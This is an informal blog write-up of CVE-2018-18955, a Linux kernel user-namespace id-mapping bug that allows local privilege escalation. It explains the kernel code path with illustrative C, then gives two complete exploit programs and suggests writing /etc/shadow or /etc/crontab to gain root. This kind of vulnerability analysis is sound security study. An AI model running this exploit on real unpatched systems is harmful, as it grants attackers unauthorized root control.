CVE-2018-18955 - A Handy LPE for Newer Linux Kernels


theres no posts about this cve as far as i know, and the original advisory is just too difficult for newbies like me, so..

warm up

whats user namespace

lets assume you use linux, man user_namespaces will give you what you need

in case you aint familiar with linux namespaces, man namespaces says:

Namespace   Constant          Isolates
Cgroup      CLONE_NEWCGROUP   Cgroup root directory
IPC         CLONE_NEWIPC      System V IPC, POSIX message queues
Network     CLONE_NEWNET      Network devices, stacks, ports, etc.
Mount       CLONE_NEWNS       Mount points
PID         CLONE_NEWPID      Process IDs
User        CLONE_NEWUSER     User and group IDs
UTS         CLONE_NEWUTS      Hostname and NIS domain name

in particular, user namespaces:

User namespaces isolate security-related identifiers and attributes, in particular, user IDs and group IDs (see credentials(7)), the root directory, keys (see keyrings(7)), and capabilities (see capabilities(7)). A process's user and group IDs can be different inside and outside a user namespace. In particular, a process can have a normal unprivileged user ID outside a user namespace while at the same time having a user ID of 0 inside the namespace; in other words, the process has full privileges for operations inside the user namespace, but is unprivileged for operations outside the namespace.

in CVE-2018-18955 (im gonna call it the cve), nested user namespaces are used, heres some info about nested user ns:

User namespaces can be nested; that is, each user namespace—except the initial ("root") namespace— has a parent user namespace, and can have zero or more child user namespaces. The parent user namespace is the user namespace of the process that creates the user namespace via a call to unshare(2) or clone(2) with the CLONE_NEWUSER flag.

and whats uid/gid mapping

the cve uses broken uid/gid mapping to achieve local privilege escalation (LPE), so first we need a basic understanding of id mapping

from man newuidmap, we get this:

uid
    Beginning of the range of UIDs inside the user namespace.

loweruid
    Beginning of the range of UIDs outside the user namespace.

count
    Length of the ranges (both inside and outside the user namespace).
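
to make the three fields concrete, heres a minimal sketch that parses one mapping line and translates an id from inside the ns to outside. the names (struct id_range, parse_range, map_to_outside) are made up for illustration, they are not part of newuidmap or the kernel:

```c
#include <assert.h>
#include <stdio.h>

/* one mapping line: "uid loweruid count" (hypothetical helper type) */
struct id_range {
    unsigned int uid;      /* first id inside the user namespace */
    unsigned int loweruid; /* first id outside the user namespace */
    unsigned int count;    /* length of both ranges */
};

/* parse "uid loweruid count"; returns 0 on success, -1 on malformed input */
int parse_range(const char *line, struct id_range *r)
{
    assert(line && r);
    if (sscanf(line, "%u %u %u", &r->uid, &r->loweruid, &r->count) != 3)
        return -1;
    return r->count == 0 ? -1 : 0;
}

/* translate an inside id to the outside id, or -1 if it is not mapped */
long long map_to_outside(const struct id_range *r, unsigned int inside)
{
    assert(r);
    if (inside < r->uid || inside - r->uid >= r->count)
        return -1;
    return (long long)r->loweruid + (inside - r->uid);
}
```

with the line "0 100000 1000", inside id 0 becomes 100000 outside, and inside id 1000 is not mapped at all because count ids starting at 0 end at 999.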

loweruid cant be chosen freely, the file /etc/subuid limits which ids you may use:

newuidmap verifies that the caller is the owner of the process indicated by pid and that for each of the above sets, each of the UIDs in the range [loweruid, loweruid+count] is allowed to the caller according to /etc/subuid before setting /proc/[pid]/uid_map

for me, its like:

jm33 subuid

i can create some uid mapping like 0 100000 1000
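
the check that newuidmap does against /etc/subuid can be pictured roughly like this. its only a sketch of the idea, not newuidmaps real code: subuid_allows is a made-up name, it looks at a single "name:start:count" entry, and it treats the requested range as count ids starting at loweruid:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * check whether count ids starting at loweruid fit inside one
 * /etc/subuid entry of the form "name:start:count".
 * returns 1 if allowed, 0 otherwise. (hypothetical helper)
 */
int subuid_allows(const char *entry, const char *user,
                  unsigned long loweruid, unsigned long count)
{
    char name[64];
    unsigned long start, len;

    assert(entry && user);
    if (sscanf(entry, "%63[^:]:%lu:%lu", name, &start, &len) != 3)
        return 0;
    if (strcmp(name, user) != 0 || count == 0)
        return 0;
    /* written without additions so nothing can overflow */
    return loweruid >= start && count <= len &&
           loweruid - start <= len - count;
}
```

assuming an entry like "jm33:100000:65536" (an example value, your file may differ), the mapping 0 100000 1000 is accepted, while anything with loweruid 0 is rejected, so an unprivileged user cant map straight onto the real root this way.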

analysis of cve-2018-18955

the culprit

from the original advisory, we know the bug was introduced by commit 6397fac4915a, so we check it out:

git check out

heres the fix:

fix

find the corresponding source file, kernel/user_namespace.c

locate map_write(), see what it does:

in the first loop, insert_extent() inserts every extent of a mapping array into new_map, which has the type struct uid_gid_map

uidgidmap

an extent is one contiguous id mapping (one line of uid_map), and a mapping array can hold several of them. heres an example with 6 extents
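
if you want to play with extents outside the kernel, heres a small userspace sketch that splits uid_map style text into extents. the field names first, lower_first and count follow the kernels struct uid_gid_extent, everything else (struct extent, parse_extents, the max parameter) is my own illustration and not kernel code:

```c
#include <assert.h>
#include <stdio.h>

/* userspace mirror of the fields in the kernel's struct uid_gid_extent */
struct extent {
    unsigned int first;       /* first id inside the new ns */
    unsigned int lower_first; /* first id in the parent ns */
    unsigned int count;       /* number of ids covered */
};

/*
 * parse uid_map style text, one extent per line.
 * returns the number of extents, or -1 on a malformed line
 * or when more than max extents are given.
 */
int parse_extents(const char *text, struct extent *out, int max)
{
    int n = 0;

    assert(text && out);
    while (*text) {
        struct extent e;
        int used = 0;

        if (sscanf(text, "%u %u %u%n",
                   &e.first, &e.lower_first, &e.count, &used) != 3)
            return -1;
        if (n == max)
            return -1;
        out[n++] = e;
        text += used;
        /* skip the line break (and stray spaces) before the next extent */
        while (*text == '\n' || *text == ' ')
            text++;
    }
    return n;
}
```

feeding it the mapping string from subshell.c further down gives 6 extents, one more than the 5 that fit in the base array.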

insert extent

then new_map uses sort_idmaps() to sort its two arrays of mappings (new_map->forward, new_map->reverse)

sort_idmaps

UID_GID_MAP_MAX_BASE_EXTENTS is 5, you can find it in the struct uid_gid_map screenshot.

when the number of extents (map->nr_extents) exceeds 5, sort_idmaps() sorts both arrays so bsearch() can be used on them later

the two arrays represent the two directions of id mapping, as the original advisory says:

binary search over a sorted array of struct uid_gid_extent is used. Because ID mappings are queried in both directions (kernel ID to namespaced ID and namespaced ID to kernel ID), two copies of the array are created, one per direction, and they are sorted differently.
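
the "two copies, sorted differently" idea can be sketched in userspace with qsort() and bsearch(). this is a simplified model with made-up names (struct extent, sort_both, lookup_down), not the kernels sort_idmaps():

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

struct extent { unsigned int first, lower_first, count; };

static int cmp_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;
    return (x->first > y->first) - (x->first < y->first);
}

static int cmp_lower_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;
    return (x->lower_first > y->lower_first) -
           (x->lower_first < y->lower_first);
}

/* forward is sorted by first, reverse is a copy sorted by lower_first */
void sort_both(const struct extent *in, size_t n,
               struct extent *forward, struct extent *reverse)
{
    assert(in && forward && reverse);
    memcpy(forward, in, n * sizeof(*in));
    memcpy(reverse, in, n * sizeof(*in));
    qsort(forward, n, sizeof(*forward), cmp_first);
    qsort(reverse, n, sizeof(*reverse), cmp_lower_first);
}

/* bsearch comparator: the key is an id, the element an extent keyed on first */
static int key_in_first(const void *key, const void *elem)
{
    unsigned int id = *(const unsigned int *)key;
    const struct extent *e = elem;

    if (id < e->first)
        return -1;
    if (id - e->first >= e->count)
        return 1;
    return 0;
}

/* ns id -> lower id via the forward array, -1 if unmapped */
long long lookup_down(const struct extent *forward, size_t n, unsigned int id)
{
    const struct extent *e =
        bsearch(&id, forward, n, sizeof(*forward), key_in_first);
    return e ? (long long)e->lower_first + (id - e->first) : -1;
}
```

the point to notice is that reverse starts life as a plain copy of the same extents, only the sort key differs.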

after sorting, every extent of new_map gets into the second loop

second loop

map_id_range_down() does the following

map_id_range_down_max

in this loop, each extents lower_first (its starting id in the parent ns) in new_map (which will be our nested ns later) is translated through parent_map and replaced with the result, which means lower_first now holds a kernel id instead of a parent ns id

after map_id_range_down(), new_map->forward array has replaced its lower_first with new ones, but the new_map->reverse array remains untouched

lets rethink what map_write() does

map_write

given the id mapping of the parent ns and the map to write to, map_write() inserts each extent into new_map, sorts both of its arrays, then translates lower_first in new_map->forward to kernel ids, while the new_map->reverse array is left untouched. in this process, parent_map provides the way to the kernel ids, via lower_first

the reverse mapping, which maps kernel ids to the ns, remains the same thing that sort_idmaps() produces

yes, new_map->reverse is generated by sort_idmaps() in the following way:

the reverse mapping

its a copy of the forward array, just a different sorting

as the sorting (and the copying that comes with it) happens before the "mapping to kernel" loop, the reverse array is never actually processed, yet map_write() installs the new map anyway. as a result, we get a broken id mapping in the new ns, where the kernel to ns mapping is actually just an unprocessed copy of the original (forward) mapping.

say we install a mapping that covers uids 0..999 (count 1000 in total). according to the analysis above, the kernel to ns direction ends up as 0..999 too, so kernel uids 0..999, including the real root, look like they are mapped in our nested ns. thats where things go wrong
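
heres a userspace model of that ordering problem. its a sketch under my own assumptions, not kernel code: the parent map is a single extent, the reverse lookup is a linear scan, and the non-buggy branch reflects how i read the fix (translate first, then copy and sort). all names are made up:

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

struct extent { unsigned int first, lower_first, count; };

/* parent ns range -> kernel id through one parent extent, -1 if not covered */
static long long map_down(const struct extent *parent,
                          unsigned int id, unsigned int count)
{
    if (id < parent->first || count > parent->count ||
        id - parent->first > parent->count - count)
        return -1;
    return (long long)parent->lower_first + (id - parent->first);
}

static int cmp_lower_first(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;
    return (x->lower_first > y->lower_first) -
           (x->lower_first < y->lower_first);
}

/*
 * model of map_write() for a map with more than 5 extents.
 * buggy != 0: copy and sort reverse BEFORE translating lower_first
 * buggy == 0: translate first, then copy and sort
 * returns 0 on success, -1 if an extent is not covered by the parent.
 */
int model_map_write(struct extent *forward, struct extent *reverse, size_t n,
                    const struct extent *parent, int buggy)
{
    size_t i;

    assert(forward && reverse && parent);
    if (buggy) {
        memcpy(reverse, forward, n * sizeof(*forward));
        qsort(reverse, n, sizeof(*reverse), cmp_lower_first);
    }
    for (i = 0; i < n; i++) {
        long long k = map_down(parent, forward[i].lower_first,
                               forward[i].count);
        if (k < 0)
            return -1;
        forward[i].lower_first = (unsigned int)k;
    }
    if (!buggy) {
        memcpy(reverse, forward, n * sizeof(*forward));
        qsort(reverse, n, sizeof(*reverse), cmp_lower_first);
    }
    return 0;
}

/* kernel id -> ns id via reverse (linear scan for brevity), -1 if unmapped */
long long model_from_kuid(const struct extent *reverse, size_t n,
                          unsigned int kuid)
{
    size_t i;

    for (i = 0; i < n; i++)
        if (kuid >= reverse[i].lower_first &&
            kuid - reverse[i].lower_first < reverse[i].count)
            return (long long)reverse[i].first +
                   (kuid - reverse[i].lower_first);
    return -1;
}
```

with a parent extent of 0 100000 1000 and the 6 extent mapping from subshell.c, the buggy order leaves reverse pointing at 0..999, so model_from_kuid() finds a mapping for kernel uid 0. with the other order, kernel uid 0 has no mapping and only 100000..100999 do.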

leverage the broken id mapping

according to the author of CVE-2018-18955 (jannh@google.com), from_kuid() is used in kuid_has_mapping(), which in turn is used by some capability checking functions such as inode_owner_or_capable() and privileged_wrt_inode_uidgid().

thats where LPE comes in: from_kuid() returns incorrect ids, resulting in an incorrect capability check, which lets an attacker gain write access to inodes they are not supposed to write to

i have a bunch of screenshots to visualize this process

prv wrt inode

kuid_has_mapping

using map reverse

finally, we are searching in map->reverse, which has been broken from the very beginning (since it was written)
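
the chain from the broken reverse array to a passing check can be modelled like this. again its a simplified sketch with made-up names (struct id_map, struct model_inode and the model_ functions), the real kernel functions take a struct user_namespace and use typed kuid_t/kgid_t values:

```c
#include <assert.h>
#include <stddef.h>

struct extent { unsigned int first, lower_first, count; };
struct id_map { const struct extent *reverse; size_t n; };
struct model_inode { unsigned int i_uid, i_gid; }; /* kernel ids of the owner */

#define INVALID_ID ((unsigned int)-1)

/* kernel id -> ns id via the reverse array, INVALID_ID if unmapped */
unsigned int model_from_kid(const struct id_map *m, unsigned int kid)
{
    size_t i;

    assert(m && m->reverse);
    for (i = 0; i < m->n; i++) {
        const struct extent *e = &m->reverse[i];

        if (kid >= e->lower_first && kid - e->lower_first < e->count)
            return e->first + (kid - e->lower_first);
    }
    return INVALID_ID;
}

/* an id "has a mapping" if the reverse lookup returns something valid */
int model_has_mapping(const struct id_map *m, unsigned int kid)
{
    return model_from_kid(m, kid) != INVALID_ID;
}

/* the ns is privileged over an inode only if owner uid and gid are both mapped */
int model_privileged_wrt_inode(const struct id_map *uid_map,
                               const struct id_map *gid_map,
                               const struct model_inode *inode)
{
    assert(inode);
    return model_has_mapping(uid_map, inode->i_uid) &&
           model_has_mapping(gid_map, inode->i_gid);
}
```

with a reverse array that still says 0..999, a file owned by kernel uid 0 and gid 0 passes this check. with correctly translated values (100000 and up), it doesnt.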

proof of concept

you can just check the original advisory for PoC

heres my screenshot showing how it works

cve-2018-18955-poc

since you can write /etc/shadow, why not just write some cron job to /etc/crontab and be root?

thanks for reading such a boring post, i am gonna show you something more boring, with comments:

subuid_shell.c

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "socketpair");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace the process with a bash shell, in which you will see "root",
        // because the setuid(0) call worked.
        // this might seem a little confusing, but you are "root" only within
        // this child ns, so you get no extra permissions in the outer ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // map ns ids 0..999 to ids 100000..100999 for the child process
    char cmd[1000];
    snprintf(cmd, sizeof(cmd), "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    snprintf(cmd, sizeof(cmd), "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    snprintf(cmd, sizeof(cmd), "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

subshell.c

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "socketpair");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns (nested, when run from the subuid_shell shell)
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you actually have root-like access, without the name/id, though.
        // technically the root access is not complete;
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of the child's /proc directory
    snprintf(pbuf, sizeof(pbuf), "/proc/%d", (int)child);

    // cd to /proc/<pid> so uid_map and gid_map can be opened by name
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
